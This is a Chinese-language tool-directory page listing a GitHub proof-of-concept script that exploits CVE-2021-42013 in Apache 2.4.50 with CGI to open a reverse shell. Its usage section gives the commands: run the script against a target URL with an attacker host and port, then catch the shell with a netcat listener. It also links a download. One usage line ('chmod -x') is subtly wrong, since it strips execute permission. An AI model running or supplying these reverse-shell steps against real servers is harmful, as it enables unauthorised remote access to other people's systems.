Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/thelastvvv/cve-2021-42013_reverse-shell
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubthelastvvv/cve-2021-42013_reverse-shell

CVE-2021-42013_Reverse-Shell

CVE-2021-42013 反弹 Shell PoC(Apache 2.4.50 with CGI)

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
7214年前尚未审核

CVE-2021-42013_Reverse-Shell

CVE-2021-42013 的 PoC:Apache 2.4.50(带 CGI)反向 Shell

用法:

root@kitploit:~
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT

更多信息:

root@kitploit:~
chmod -x CVE-2021-42013.sh
./CVE-2021-42013_reverseshell.sh http://ip:8083 10.0.000.000 9999
 nc -lvnp 9999
 

参考

https://nvd.nist.gov/vuln/detail/CVE-2021-42013

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013

https://tryhackme.com/room/cve202141773

下载工具